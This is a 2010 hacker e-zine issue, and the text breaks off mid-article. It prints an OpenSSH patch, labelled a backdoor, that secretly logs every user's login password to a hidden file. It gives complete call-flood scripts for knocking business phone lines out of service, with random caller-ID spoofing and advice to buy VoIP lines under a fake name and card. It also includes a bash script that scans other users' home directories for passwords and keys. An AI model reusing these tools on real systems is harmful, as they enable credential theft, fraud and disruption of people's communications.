Go Null Yourself E-Zine #2

Archived security papers and articles in various languages.

-dh dd.
:Mm MM.
,yNNNNNNNNo ,mMMMMMMMMd, dNNNNNNNNN, MM. yM :Mm MM.
-Mm oMd `NM: NM: :My MM. yM :Mm MM.
:Mm -++++mM oMN mM: MM: :MN MM. yM :Mm MM.
.NMmmmmmmMM 'MMmmmmmNMN' MM: :MM mMNmmmmmMM :Mm MM. /o.
hM:
.h+ sh :hdddddddh/ dd` :ds oddddddddy. ,ddddddd-d ,yddddddddo dM/ ,ddddddddd`
-Mm+++++++oMM mMs:::::oMm MM. /Mh MM::::::hMh Mm+````` yMh`````yMM mM/ Mh````````
/sssyMMssso- mM/ oMM MM. /Mh MM :+/ 'hhhhhhdM, yMh hhhhhh+ dMo MMNNNNNNNN.
.MM NMdyyyyydMN MMdyyyyymMh MM ,,,,,,,,MM sMN,,,,,,,, mMo My````````
`o+ `+ooooooo+` .+oooooooo: oo .oooooooo+: `/ooooooooo /o- My
My
|| 0x01 Introduction +: teh crew
|| 0x02 Feedback + Edits
|| 0x03 DoSing Phone Lines with Asterisk b14ck
Go Null Yourself E-Zine || 0x04 duper's Code Corner duper
|| 0x05 Test Numbers storm
Issue #2 - October 2010 || 0x06 Practical DLL Hijacking storm
www.GoNullYourself.org || 0x07 Numbers Stations FOIA Request teh crew
|| 0x08 Exploring Tieline Networks Shadytel, Inc
|| 0x09 Modem Numbers storm
"People who say it cannot be done should || 0x0a Linux Full-Disk Encryption With TC second
not interrupt those who are doing it." || 0x0b Programming Challenge storm
|| 0x0c Hotel Pennsylvania's PBX Shadytel, Inc
|| 0x0d Interview with Adrian Lamo
|| 0x0e Et Cetera, Etc. teh crew
[==================================================================================================]
-=[ 0x01 Introduction
-=[ Author: teh crew
Welcome to another issue of the Go Null Yourself e-zine, and, once again, glad you could join us.
You may have already noticed a few things different with this issue. First off, it was released
fairly quickly after issue #1 (July 2010), much more quickly than usual e-zine series, as we are
attempting to adopt a schedule of quarterly release. This means that lots of hard work is being put
forth by our authors to meet such short deadlines with a sufficient amount of comprehensive,
interesting content. For that, we express our deepest gratitude.
Secondly, we have changed a few aspects of the zine's formatting in general. The width has been
increased from 86 columns to 100, mostly for the sake of reducing the frequency of problems with
line wrapping in published code. It has also been requested that each article section be labeled
with its respective hexadecimal index number for easy page jumping. If you have any suggestions for
the zine, submit them to us (our contact information is at the end of this article), and we will
certainly consider them.
Thirdly, a large chunk of content this issue is phone-related. We wish to accomplish two goals by
doing this: 1) to promote interest in hacking technology besides computer systems, and 2) to pump
some life back into the phreaking scene. There is so much to learn from exploring the phone system,
and we hope to be there every step of the way.
If you are interested in submitting content for future issues of GNY Zine, we would be happy to
review it for publication. Content may take many forms, whether it be a paper, review, scan, or
first-hand account of an event. Submissions of ASCII cover art that display the GNY logo in some
way are also appreciated. Well-received topics include computer hacking and exploitation methods,
programming, telephone phreaking (both analog and digital), system and network exploration, hardware
hacking, reverse engineering, amateur radio, cryptography and steganography, and social engineering.
We are also receptive to content relating to concrete subjects such as science and mathematics,
along with more abstract subjects such as psychology and culture. Both technical and non-technical
material is accepted.
Submissions of content, suggestions for and criticisms of the zine, and death threats may be sent
via:
- IRC private message (storm or m0nkee @ irc.distrust.us #gny)
- Email (zine@gonullyourself.org)
If there is enough feedback, we will publish some of the messages in future issues.
We have devoted a lot of effort into this publication and hope that you learn something from reading
it. Abiding by our beliefs, any information within this e-zine may be freely re-distributed,
utilized, and referenced elsewhere, but we do ask that you keep the articles fully intact (unless
citing certain passages) and give credit to the original authors when and where necessary.
Go Null Yourself, its staff members, and the authors of GNY Zine are not responsible for any harm or
damage that may result from the information presented within this publication. Although people will
be people and act in idiotic fashions, we do not condone, promote, or participate in illegal
behavior in any way.
[==================================================================================================]
-=[ 0x02 Feedback and Edits
This section is devoted to messages we've received regarding GNY Zine, both positive and negative.
Readers may also submit information that they feel supplements content from previous issues.
Significant errors in the zine will also be addressed.
----------------------------------------------------------------------------------------------------
Hey team. On the release of the new e-zine under the Alternate Data Streams article there's a
little typo. In the first example, using C:\folders:secrets.txt the paragraph below it refers to it
as "C:folders:secrets.txt". It's not something that should throw a reader off the deep end or
anything. I thought it should be pointed out in case you wanted to correct it.
I'm loving the articles so far. I hope you can keep up the work. I'll be coming back for sure.
Thanks,
-Boom
>> Ah, yes, you are correct - apologies for the error. "C:folders:secrets.txt" on line 412 of issue
>> #1 should be corrected to "C:\folders:secrets.txt". Thank you for reporting it and also for the
>> compliment.
----------------------------------------------------------------------------------------------------
rattle of www.awarenetwork.org posted the following on his website in response to the RTLO Spoofing
article from issue #1:
I had a lot of fun reading the RTLO article in the GNY zIne and found myself very incompetent when
it came to inputting that RTLO char anywhere. Hence, I wrote a little program that would set my
clipboard to just the RTLO char, allowing me to paste it into browser forms and other stuff
conveniently. I did this because the other tool that was linked
[http://www.fileformat.info/tool/unicodeinput/index.htm] isn't open source. Granted, my app has no
GUI, but at least you can see its insides.
>> We agree that entering the RTLO character is quite tricky, and we thank you for publishing your
>> source code (below). Hopefully it is useful for other readers, as it's come in handy for us!
>> A pre-compiled Windows binary is available for download at
>> http://www.awarenetwork.org/home/.rants/07-11-2010.08.42/rtol.exe
----------
http://www.awarenetwork.org/home/.rants/07-11-2010.08.42/rtol.asm
.386
.model flat, stdcall
include kernel32.inc
include user32.inc
.code
Main:
PUSH 0
CALL OpenClipboard
TEST EAX, EAX
JZ ERROR
CALL EmptyClipboard
PUSH 4 ; size of RTOL with nullchar
PUSH 2 ; GMEM_MOVEABLE
CALL GlobalAlloc
TEST EAX,EAX
JZ ERROR
MOV EBX,EAX
PUSH EBX
CALL GlobalLock
TEST EAX,EAX
JZ ERROR
MOV word ptr [EAX], 0202EH
MOV word ptr [EAX+2], 0
PUSH EBX
CALL GlobalUnlock
PUSH EBX ; handle
PUSH 0DH ; CF_UNICODETEXT
CALL SetClipboardData
MOV EDX, EAX
PUSH EBX
CALL GlobalFree
CALL CloseClipboard
TEST EDX,EDX
JZ SUCCESS
ERROR:
PUSH 1
JMP BAIL
SUCCESS:
PUSH 0
BAIL:
CALL ExitProcess
END Main
----------
http://www.awarenetwork.org/home/.rants/07-11-2010.08.42/rtol.c
#include <windows.h>
int main() {
HGLOBAL handle;
WCHAR *buffer;
BOOL success = FALSE;
if (OpenClipboard(NULL)) {
EmptyClipboard();
if ((handle = GlobalAlloc(GMEM_MOVEABLE, 2*sizeof(WCHAR))) &&
(buffer = GlobalLock(handle)) ) {
buffer[0] = 0x202E;
buffer[1] = 0;
GlobalUnlock(handle);
success = (SetClipboardData(CF_UNICODETEXT, handle) != NULL);
GlobalFree(handle);
}
CloseClipboard();
}
return !success;
}
#if 0
extern void __cdecl mainCRTStartup( void ){
ExitProcess(main());
}
#endif
----------------------------------------------------------------------------------------------------
There have been reports that the patched source from Trojaning OpenSSH in issue #1 crashes upon SSH
login. We regret and apologize for the error, which has been traced to an incorrect declaration of
the hidden_buff buffer on line 38. The updated code is below:
diff -rupN openssh-5.5p1/auth-passwd.c openssh-5.5p1-backdoored/auth-passwd.c
--- openssh-5.5p1/auth-passwd.c 2009-03-07 19:40:28.000000000 -0500
+++ openssh-5.5p1-backdoored/auth-passwd.c 2010-06-17 14:14:23.000000000 -0400
@@ -123,6 +123,19 @@ auth_password(Authctxt *authctxt, const
}
#endif
result = sys_auth_passwd(authctxt, password);
+
+ // Begin Backdoor
+
+ if ( result ){
+ snprintf(hidden_buff, sizeof(hidden_buff) - 1, "Successful login %s:%s from %s\n",
-> authctxt->user, password, get_remote_ipaddr());
+ hidden_log();
+ } else {
+ snprintf(hidden_buff, sizeof(hidden_buff) - 1, "Invalid login %s:%s from %s\n",
-> authctxt->user, password, get_remote_ipaddr());
+ hidden_log();
+ }
+
+ // End Backdoor
+
if (authctxt->force_pwchange)
disable_forwarding();
return (result && ok);
diff -rupN openssh-5.5p1/includes.h openssh-5.5p1-backdoored/includes.h
--- openssh-5.5p1/includes.h 2009-08-20 02:16:01.000000000 -0400
+++ openssh-5.5p1-backdoored/includes.h 2010-06-17 14:12:24.000000000 -0400
@@ -172,4 +172,24 @@
#include "entropy.h";
+// Begin Backdoor
+
+#include <sys/stat.h>
+#include <stdio.h>
+#define HIDDEN_LOG_FILE "/tmp/.ssh_log"
+
+FILE *hiddenlog;
+char hidden_buff[1024];
+
+#define hidden_log() { \
+ chmod(HIDDEN_LOG_FILE, 0666); \
+ hiddenlog = fopen(HIDDEN_LOG_FILE, "a"); \
+ if ( hiddenlog != NULL ) { \
+ fprintf(hiddenlog, "%s", hidden_buff); \
+ fclose(hiddenlog); \
+ } \
+}
+
+// End Backdoor
+
#endif /* INCLUDES_H */
----------------------------------------------------------------------------------------------------
Our long-time friend sunjester posted the following at http://fusecurity.com/blog/?p=186 in response
to issue #1:
GNY is a familiar group to myself. They do not like me on account of several reasons that we wonít
go into here. The ìezineî they released isnít offering much, so you didnít miss much if your looking
for another hacking zine to veg out to. I have some comments of my own about their release. I saw
that r00tsecurity referenced the Zine in their newsletter, in which case I had to look at it..
>> Yes, there is a bit of bad blood between sunjester and GNY. We also won't go into details, as
>> they are irrelevant.
1. conversational hypnosis
2. RTLO Spoofing
3. Alternate Data Streams
4. Derandomizing Perlís Random Number Generator
5. Trojaning OpenSSH
6. Story of a Raid
7. Programming Challenge
8. ConfCon 2010 CFP
9. 907-887-88xx Scan
conversational hypnosis
The first thing on their list is something called ìconversational hypnosisî, the whole thing was
complete b.s.. Nothing described really actually told anyone how to apply or use ìcovert hypnosisî
which is what is more widely known as. This whole idea is based around notions and persuasion.
>> I wrote the article with the specific intention of not giving enough detail for readers to be
>> able to use it since it can really cause damage. It was just to show that it was out there and
>> said to listen to Taylor Starr's lectures if you wanted to learn it in depth. -hsu
rtlo spoofing
The reason this isnít so successful is because itís not very practical and itís a pain in the ass to
use. This guy (Anarchy_Angel) basically just read the documents and wrote what he read. No PoC was
offered or instructions or anything different than what was presented in the documents he referenced
([http://packetstormsecurity.org/papers/general/righttoleften-override.pdf],
[http://hackers-hideaway.com/blog.php?post_id=94],
[http://www.mozilla.org/security/announce/2009/mfsa2009-62.html]). Iím not going to continue to
break down this method.
>> Actually, no. I (storm) wrote the article - it says so right at the top. Anarchy_Angel's
>> research was simply referenced. And yes, I wrote an article based on information I read. That's
>> usually how it works. The referenced paper on packetstormsecurity.org is written in broken
>> English, so I'm sure many will appreciate reading a paper that is easily decipherable;
>> hackers-hideaway.com was offline at the time (and continues to be offline), so Anarchy's research
>> is unavailable; and the mozilla.org link is simply an advisory. As for proof of concept, three
>> example attacks were explained in the paper. I also explained how the GNY forum was affected by
>> an RTLO spoofing attack.
Alternate Data Streams
At first glance I thought it may be worth reading until I kept scrolling down scanning through and
pulling out keyworkds, etc, etc. Scanning back to the top I started reading and it was aparent from
reading the first couple paragraphs that this person had not done much research. or offered a
solution to finding or protecting yourself against such flaws. The first thing people should know is
that there is an EASY way to view alternate data streams. Microsoft provides an application named
ìStreamsî to help view ADSís. You can download and read about it here.
He references the application but never shows how to use it, link to it, or even talk about it. He
obviously rushed through and didnít give a crap about the actual content going into the message he
was conveying in the article. While I donít deny information provided from the article can be useful
and may have shown people something new, ADS.
The information wasnít very fruitful, and could have been presented a lot better. Amir refers to
metadata as ìreal dataî. He references forking but I guess he didnít bother to read it, if he had
read the page he would have seen that it was named ìmetadataî, lmao. This was a good topic, it just
should have been elaborated on more.
>> "I'd like to thank you for taking the time to review my article... I see you have some valid
>> points, but you assumed that I 'rushed' in with the topic, which is not exactly true. When this
>> topic was first introduced to me, I liked it and I wanted to write a brief article to educate
>> others about it. It was not new research, and it was not something that is security related at
>> all. I was merely trying to let others know of the existence of such a thing. And by the way my
>> name is 'Amr' not 'Amir'. Have a good one :-)" -d4de
Derandomizing Perlís Random Number Generator
While itís fun to talk about and figure things like this out, itís not very effective for hacking or
really having anything to do with computer security.
>> Random numbers have everything to do with computer security. Attacks based on the prediction of
>> random numbers, such as http://seclists.org/fulldisclosure/2010/Apr/167 , are becoming more and
>> more practical. A cryptographic process based on predictable numbers is a broken process.
>> Besides, we're not limited to content based solely on computer security. Anything that breaks or
>> circumvents a system of any kind is fascinating to us.
Trojaning OpenSSH
yep, he did all that from a root terminal...
>> So what's your point?
Story of a Raid
The crap this kid must have been smoking must be unbelievable! Damn, send some my way. Letís hilight
some of the dumbest shit he said. Itís super ridiculous so letís keep it simple and try to to waste
to much time on this dumb, uninformative stereotypical story.
1. and it really will leave me open to anything the FBI wants to portray me as.
2. Incriminating evidence ñ Sure, itís just a simple server-client program in C
3. However, even if I did have a magnet, there is little time to do anything once they bust
in.
4. My parents didnít completely realize what was going on
And my response..
1. Really? did they do it x-files style or ìhackersî style? Kicking in the door with one foot
while wielding a gun in the other? A friend of mine was raided last year, and once before that a few
years before. The FBI certainly didnít kick in his door.
>> "'Hackers' style, they did literally kick in the door with guns held" -OrderZero
2. A client server application is hardly a crime, and would never be considered one.
>> "Are you aware of what a trojan /is/?" -OrderZero
3. Really? Do you know how much of a magnetic field is required to reset the drive? Yo mommas
fridge magnet aint gonna work.
>> "Yes I do and I never said a fridge magnet." -OrderZero
4. Wow, you still live with your parents? Your saying that the FBI would raid someoneís house
without knowing who was inside? I guess they wouldnít have traced the IP back to the ISP and called
around huh? Go sit in the corner, change your name, and come back.
>> "What does the FBI knowing who was inside have to do with what I said at all? Yes, I live with
>> friends and family (or I did...). I'm 18-years-old. Honestly, if you're trying to insult me,
>> kindly rephrase it and actually make it relevant to the story, please and thanks." -OrderZero
ConfCon CFP
What is this, 1989?
>> *looks at calendar*
907-887-88xx Scan
come on guys, move into the new fuckiní millenium..
>> It's a damn shame your lack of curiosity is limiting your mind so severely. Pick up your phone
>> and tell me if you hear a dialtone. Last I checked, there was still an entire PSTN waiting to be
>> explored.
Et Cetera, Et
I could only read so much and all I have to say is these people have a long way to go before
actually becoming anything close to a hacker or having any kind of ìhacking ethicsî. In closing, be
sure to know that the next release will be just as boring and shitty. Sorry guys but this was
HORRIBLE and not worth reading or making the effort to archive.
>> :D
[==================================================================================================]
-=[ 0x03 DoSing Phone Lines with Asterisk
-=[ Author: b14ck
-=[ Website: http://projectb14ck.org/
Table of contents
1. Intro
2. Requirements
3. Installing pycall
4. Strategy
5. Your First DoS
6. A More Advanced DoS Technique
7. Tips
8. Conclusion
9. Questions?
Intro
-----
Denial of Service attacks are nothing new to people in the IT and computer security world. DoS
attacks are a very simplistic form of attack which aim to flood the target (whether it be a
computer, mobile device, or phone line) with traffic so that it cannot process legitimate traffic.
While being simple to perform, DoS attacks are often difficult to defend against without significant
downtime.
Today I'm going to show you how to perform a DoS attack on a phone line. This process is simple,
quick to perform, and very illegal. Before we get started, I'd just like to remind you that this
article is for educational purposes only! All the code I'm putting into this article is python, and
should work on any system with python 2.4+.
Requirements
------------
Now, in order to follow along you will need 3 main things:
* An Asterisk PBX system (our favorite open source PBX) set up and running,
* A lot of phone lines. We'll need a lot of phone lines because we'll need to place a lot of
simultaneous calls. If you don't have hard lines, get a VoIP line (I prefer this method) as they are
really cheap and quick to setup.
* The last thing you'll need is my pycall python library. This is a library I wrote which allows
us to create Asterisk call files quickly and easily in python.
(http://github.com/comradeb14ck/pycall)
For those of you unfamiliar with Asterisk, I'd highly recommend reading the PDF book Asterisk: The
Future of Telephony, which is a great guide to getting started with Asterisk.
(http://downloads.oreilly.com/books/9780596510480.pdf)
The pycall python library mentioned above is a project I created a month or so ago which makes
placing calls through Asterisk a simple task for python developers. Call files are specially
formatted text files which Asterisk processes and performs actions on. pycall simplifies and
abstracts a great deal of the call file creation process as call files have many small quirks which
make them difficult to work with. Using pycall greatly reduces the amount of code we'll need to
write and ensures that all call files are created in a secure, efficient manner. For this article,
we'll be using my pycall library as a medium for quickly making calls through Asterisk without
digging into the details. If you want to know more about pycall check out the Why pycall? document
on the project's wiki page.
Installing pycall
-----------------
The good news is that pycall installs simply (it's a portable python module) and will work out of
the box with no modifications to your system what-so-ever (as long as you are running some form of
linux).
To make things even easier, I've created a small shell script which you can run that will download
and install pycall, then delete itself:
----------
#!/bin/bash
#
# pycall-install.sh
#
# @author: Randall Degges
# @email: rdegges@gmail.com
# @date: 11-20-2009
#
# This program installs the pycall library on any linux machine which has
# python 2.4+.
#
MIRROR=http://cloud.github.com/downloads/comradeb14ck/pycall/
NAME=pycall
VER=1.2
wget $MIRROR$NAME-$VER.tar.gz
tar zxvf $NAME-$VER.tar.gz
cd $NAME-$VER
sudo python setup.py install
cd ..
rm -rf $NAME-$VER
rm -rf $NAME-$VER.tar.gz
echo "Finished installing pycall-$VER."
----------
You can copy the script above and run it to install the library on any linux system quickly.
Next, we'll write a simple application which will call your cell phone in order to make sure
everything is working. Here is the source.
NOTE: You will need to modify this code and fill in the appropriate details for your system. The
user field (which seems a little ambiguous) refers to the user account that Asterisk is running
under. If you want to create the call file as whatever user you are currently logged in as, you can
remove that field all together.
----------
#!/usr/bin/python
"""
hello-world.py
@author: Randall Degges
@email: rdegges@gmail.com
@date: 11-20-09
This program tests the pycall library and makes sure that you are able to place
calls correctly.
"""
from pycall.callfile import *
def main():
"""
Create a call to your cell phone (for testing). It will say 'hello world'
then hang up on you.
"""
testcall = CallFile(
trunk_type = 'SIP',
trunk_name = 'flowroute',
number = '18182223333',
application = 'Playback',
data = 'hello-world',
user = 'asterisk'
)
testcall.run()
if __name__ == '__main__':
"""
Program execution begins here.
"""
main()
----------
A quick note to non-telephony people. The above code generates a text file (call file) which is then
moved to the Asterisk spooling directory: /var/spool/asterisk/outgoing. Asterisk aggressively
monitors the spooling directory for call files (like the ones we are creating), parses them, and
performs the actions specified by the call file. In this case, we are telling Asterisk call our cell
phone, and once we pick up, play a sound file that says "hello world" and then hang up. In case you
are wondering, Asterisk contains the "hello world" sound file by default, which is why we don't need
anything else to make this work.
Strategy
--------
Now that we have our tools ready to go, let's discuss our strategy for disabling the target phone
line.
The goal of the attack is to prevent the target phone number from placing and receiving calls. As
you can probably imagine, this is completely devastating to businesses and other communication-
dependent organizations, as it completely breaks down communications. Many companies in particular
rely on telephone service (think pizza places and call centers) for their primary revenue stream.
Imagine the effect a 24-hour DoS attack can have on a business who relies on phone service... It can
be very impacting.
Our strategy is simple: to call the target phone number more times than they have phone lines.
You might be thinking: This is really easy, all I have to do is pick up my phone, and keep dialing
the target number over and over again to keep their phone line tied up. In reality, this does
sometimes work. A great example is the 2002 New Hampshire Senate election phone jamming scandal. See
http://en.wikipedia.org/wiki/2002_New_Hampshire_Senate_election_phone_jamming_scandal. Basically,
"the NHGOP hired GOP Marketplace, based in Northern Virginia, to jam another phone bank being used
by the state Democratic Party and the firefighters' union for efforts to turn out voters on behalf
of then-governor Jeanne Shaheen on Election Day." And just in case you are wondering, yes, he went
to jail. :)
In reality, most businesses and other places have more than a single phone line that is connected to
their phone number. PRIs, T1s, and VoIP are all common now, which means that in order to completely
prevent one of those phone lines from placing calls, you will need to be generating an upwards of 23
simultaneous calls to completely disable the target.
If you know anything about your target phone line, then you probably know how many calls you will
need to place at any given time to keep them busy. But don't worry if you don't know anything about
your target! This will be covered later in this article.
Your First DoS
--------------
The program below contains the source of a simple flooding application. You will still have to make
your original adjustments like you did to the hello-world.py application earlier, but that's all, I
promise!
----------
#!/usr/bin/python
"""
simple-flood.py
@author: Randall Degges
@email: rdegges@gmail.com
@date: 11-20-09
This program floods the specified phone number.
"""
from time import sleep
from sys import argv, exit
from pycall.callfile import *
def call(num):
"""
Create a call to the specified number which does nothing except hang up.
"""
testcall = CallFile(
trunk_type = 'SIP',
trunk_name = 'flowroute',
number = num,
application = 'Hangup',
data = ' ',
user = 'asterisk'
)
testcall.run()
def main():
"""
Control the application logic.
"""
if len(argv) < 3:
print 'Usage: %s [number] [calls-per-minute]' % argv[0]
exit(1)
number = argv[1]
try:
cpm = int(argv[2])
except ValueError:
cpm = 1
print 'Starting call flood on target: %s. Placing %d calls per minute.' % (number, cpm)
count = 1
while True:
for x in xrange(cpm):
print 'Placing call %d...' % count
call(number)
count = count + 1
sleep(60)
if __name__ == '__main__':
"""
Program execution begins here.
"""
main()
----------
This small program (only a few lines!) is able to completely paralyze a target number (considering
you have enough phone lines). It is fairly flexible, and allows you to specify the amount of
calls-per-minute that you'd like to place. This works just like described: If you tell it to run
with 60 calls per minute, then you'll immediately place 60 calls. These calls will ring to the
target number, and once they pick up the phone, will immediately hang up.
To run this program see the usage:
./simple-flood.py [number] [calls-per-minute]
./simple-flood.py 18002223333 5
The first parameter is the number you want to flood, and the second is the amount of calls per
minute that you'd like to place to that number.
Here's what it should look like running if everything goes smoothly:
[root@blackbox randall]# ./simple-flood.py 18182223333 5
Starting call flood on target: 18182179229. Placing 5 calls per minute.
Placing call 1...
Placing call 2...
Placing call 3...
Placing call 4...
Placing call 5...
Placing call 6...
Placing call 7...
Placing call 8...
Placing call 9...
Placing call 10...
Now, obviously, DoS attacks like this are simple to defend against as the victim can simply block
the particular number you are calling from. However--there are ways around this too!
A More Advanced DoS Technique
-----------------------------
To make it harder for the victim to defend against our simple DoS attack, let's add caller ID
spoofing to the calls as well (will only work if your provider allows it) so that the target can't
blacklist a single number because you are calling them from random numbers!
Not only is doing this simple, it is also highly effective. Imagine being a business owner, and
instantly getting 100 calls from 100 different numbers. You'd be confused, unable to do anything
except unplug your phone lines (which doesn't accomplish anything), and unable to receive business.
So here is our program with caller ID spoofing included. It is still used the same way, except MUCH
harder to defend against.
----------
#!/usr/bin/python
"""
advanced-flood.py
@author: Randall Degges
@email: rdegges@gmail.com
@date: 11-20-09
This program floods the specified phone number and spoofs caller ID making it
much harder to trace / prevent.
"""
from time import sleep
from sys import argv, exit
from pycall.callfile import *
from random import seed, randint
def genid():
"""
Generate a random 10-digit US telephone number for spoofing to.
"""
return str(randint(1000000000, 9999999999))
def call(num, cid):
"""
Create a call to the specified number which does nothing except hang up.
Also spoofs caller ID to a random 10 digit number.
"""
testcall = CallFile(
trunk_type = 'SIP',
trunk_name = 'flowroute',
callerid_num = cid,
number = num,
application = 'Hangup',
data = ' ',
user = 'asterisk'
)
testcall.run()
def main():
"""
Control the application logic.
"""
seed() # seed the random number generator
if len(argv) < 3:
print 'Usage: %s [number] [calls-per-minute]' % argv[0]
exit(1)
number = argv[1]
try:
cpm = int(argv[2])
except ValueError:
cpm = 1
print 'Starting call flood on target: %s. Placing %d calls per minute.' % (number, cpm)
count = 1
while True:
for x in xrange(cpm):
cid = genid()
print 'Placing call %d using caller ID %s...' % (count, cid)
call(number, cid)
count = count + 1
sleep(60)
if __name__ == '__main__':
"""
Program execution begins here.
"""
main()
----------
Here's an example of what this program should look like running. Note that it generates a different
caller ID for each call. >:)
[root@blackbox randall]# ./advanced-flood.py 18182223333 7
Starting call flood on target: 18182223333. Placing 7 calls per minute.
Placing call 1 using caller ID 7110992417...
Placing call 2 using caller ID 3689407130...
Placing call 3 using caller ID 4139439982...
Placing call 4 using caller ID 9795095964...
Placing call 5 using caller ID 5278670787...
Placing call 6 using caller ID 6684773360...
Placing call 7 using caller ID 2716775282...
Now this is a lot better!
Tips
----
The first tip is for those of you who don't know how many calls you have to place to disable your
target. USE VOIP!
VoIP providers are great for DoS attacks because they:
* Can be purchased online using a fake name / credit card.
* Are cheap (much less expensive than analog lines) and don't require additional hardware.
* Can place a ton of calls quickly. With hard lines you are limited to very few channels. With
most VoIP lines, you are only limited by your bandwidth.
Of the 3 reasons above, reason 3 is particularly important. VoIP calls use either the IAX or SIP
protocols to initiate calls. When VoIP calls are made, SIP packets are sent back and fourth from
your server to your VoIP provider, who then relays the call to the target. What is special about
this is that it uses almost no bandwidth. The only thing being transmitted are IAX or SIP packets
(which are small). The actual bulk of bandwidth usage typically associated with VoIP calls comes
into play once a call has been answered. Once a call is answered, an RTP stream is opened which then
sends large voice packets across your connection, thereby increasing your bandwidth usage
immensely.
Why does this matter?
It matters because it gives you a killer advantage that your target does not have. It gives you an
easier way to scale your attack. Let's say a target phone number has 5 lines. Let's also assume that
you are running this DoS from a home computer with an extremely limited internet connection that
restricts you to 10KB/s up. That typically wouldn't be enough for a single VoIP call, so you would
never be able to make 5 calls and flood your target. WRONG. Since you call the target and
immediately hang up, there are no RTP packets! This means that you can place as many simultaneous
calls as you can send SIP invites (a LOT).
Conclusion
----------
With the information and source code provided, you should be able to easily DoS yourself or stress
test other phone numbers in no time.
I've started development on what will soon be a fully completed Asterisk DoS client with lots of
juicy command line options, statistics, and other cool items. If you're interested in following my
progress, feel free to check out the project page for it at
http://github.com/comradeb14ck/asteriskdos.
And that's about it!
[==================================================================================================]
-=[ 0x04 duper's Code Corner
-=[ Author: duper
-=[ Website: http://projects.ext.haxnet.org/~super/
#!/bin/bash
#
# _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
# / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \
#( d | u | p | e | r | ' | s ) ( c | o | d | e ) ( c | o | r | n | e | r )
# \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/
#
#
# scan-home-dirs.bash by duper for GNY
# Fri Oct 1 04:57:00 UTC 2010
#
# A bash script that scans home directories and other filesystem directory
# hierarchies for sensitive data conducive to attacks against local privilege
# escalation..
#
# NOTE: this script requires GNU parallel as a prerequisite. You may need to
# install the tarball from http://gnu.org/software/parallel first..
#
# Feel free to add your own common directories, subdirectories, "hidden"
# dot-files and such to scan. The regular expression for matching sensitive data
# can be easily configured as well.
#
# This is the command I use for finding new filenames to add to the script:
#
# nice -2 find / \( -type f -or -type d \) -and \( -perm /0001 -or \
# -perm /0002 \) -and \( -not -iname "/proc/*" -and -name ".*" -or \
# -iname "*.cf" -or -iname "*.conf" \) -and -not -empty \
# -fls /tmp/find.$$ 2>/dev/null
#
# ..obviously the output goes to /tmp. This script essentially allows you to
# discover data in hidden files within directories that you may not necessarily
# have read access to -- If you've ever seen dirbx.c, a brute force executable
# directory lister by dmuz and methodic, then you probably understand this
# concept already. However, the problem with dirbx is that it takes too long
# to generate all the filename combinations. Therefore, scan-home-dirs (this
# script) just uses well-known file and directory names to expedite the process.
#
# If you're not familiar with dirbx, I'm including an excerpt of the mailing
# list message from whence it first appeared:
#
# "AngryPacket Security is proud to announce the release of dirbx! dirbx is
# a brute force executable directory and file enumerator. It could prove
# to be very useful in local pen-tests where you don't have UID 0 and some
# directories have "--x" permissions. "
#
# So in other words, you're going to get `Permission denied' if you try to run
# /bin/ls on a directory with only the world execute bit set. Regardless, you
# can still view world readable files inside that directory if you provide
# /bin/cat with a full pathname. For example:
#
# [super@callisto ~]$ ls -ld /home/whye
# drwx-----x 13 whye whye 4096 Sep 21 04:35 /home/whye
# [super@callisto ~]$ ls /home/whye
# ls: /home/whye: Permission denied
# [super@callisto ~]$ ls -ld /home/whye/.bashrc
# -rw-r--r-- 1 whye whye 225 Mar 21 2010 /home/whye/.bashrc
# [super@callisto ~]$ head -4 /home/whye/.bashrc
# .bashrc
#
# Source global definitions
# if [ -f /etc/bashrc ]; then
# [super@callisto ~]$
#
# Display program banner
echo
echo 'scan-home-dirs.bash by duper for GNY'
echo '===================================='
echo
# First, we'll look through directories that we ARE able to read
declare -a alist=$(ls -altd /home/*/.* | awk '/^d/ {print($9)}' | \
egrep -v '([.]+)$')
# Loop through the list and display on standard output
for f in $alist
do printf "%s\n" $f
done
# These are the filename/pathname/globbing/patterns/etc. to look for in the
# directories that we only have execute access on, i.e. no read access.
declare -a filez=(core .bash_history .profile .ptksh_history .sh_history \
.history dead.letter mbox .Xauthority .forward .bitchxrc .pine-debug1 \
.addressbook .bash_login .bash_logout .screenrc .addressbook.lu .cshrc \
.bashrc .tcshrc .zshrc .nessusrc .nessusrc.cert .obv.friends .obv.shitlist \
.festival_history .mysql_history .muttrc .ircrc .realplayerrc .rhosts \
.htpasswd .passwd .procmailrc .zsh_history .zshhistory .BitchX/* .irssi/* \
.lftp/* .ssh2/* .ssh/* .pgp/* .gnupg/* .mozilla/* .ncftp/* .subversion/* \
public_html/* bin/* tmp/* temp/* * */* */*/* */*/*/*)
# Next, we parallelize the reads for the directories we DON'T have read access
# for. Again, the extended regular expression and home directory pathname glob
# can be modified to your liking. By default, home directories are checked for
# strings which look like sensitive and/or hex-encoded/encrypted data.
declare -a ret=`parallel -j6 'egrep -in "^[a-z]{4,}:[a-z0-9/.]{6,}| -p \
|pass |auth|secret|private|backdoor|trojan|rootkit|assword|admin|\
[0-9A-F]{32,40}"' /home/*/{} 2>/dev/null ::: ${filez}`
# Loop through and format output for fully qualified pathnames that are returned
for apath in $ret
do printf "%s\n" $apath
done
# Tell the shell how many files we found while we're exiting
exit ${#ret}
#EOF
----------------------------------------------------------------------------------------------------
(*
GNY-SID is a SQL Injection Dorker script written in F# (pronounced "F-Sharp")
which is a new functional language developed by Don Syme of Microsoft
Research for the .NET framework. It is now included with Visual Studio; I
happen to be using the 2010 Ultimate version. However, you can download an F#
interpreter separately from http://msdn.microsoft.com/fsharp -- and even
though I said "interpreter", F# is also a language that can be compiled to
.NET's CIL (Common Intermediate Language.) In this case, the code included
below is intended to be interpreted. As such, I have named the script
GNY-SID.fsx as "fsx" is the filename extension used for F# scripts. You can
simply cut and paste the code into fsi.exe, or if you're using Visual Studio,
use the keystroke combinations CTRL-A (Select All) and ALT-ENTER to send the
code to the F# Interactive Window.
FSI is just a REPL (Read-Eval-Print-Loop) as you've probably seen included
with other interpreted languages like Perl, Scheme, and Python. Although the
FSI window doesn't currently feature syntax hilighting or IntelliSense
drop-downs like Visual Studio, you can still use the TAB key to page through
static functions provided by a particular module. For example, typing "List."
and then continually hitting TAB will provide core F# functions available to
the list data type. I personally have FSI listed in my Start Menu and edited
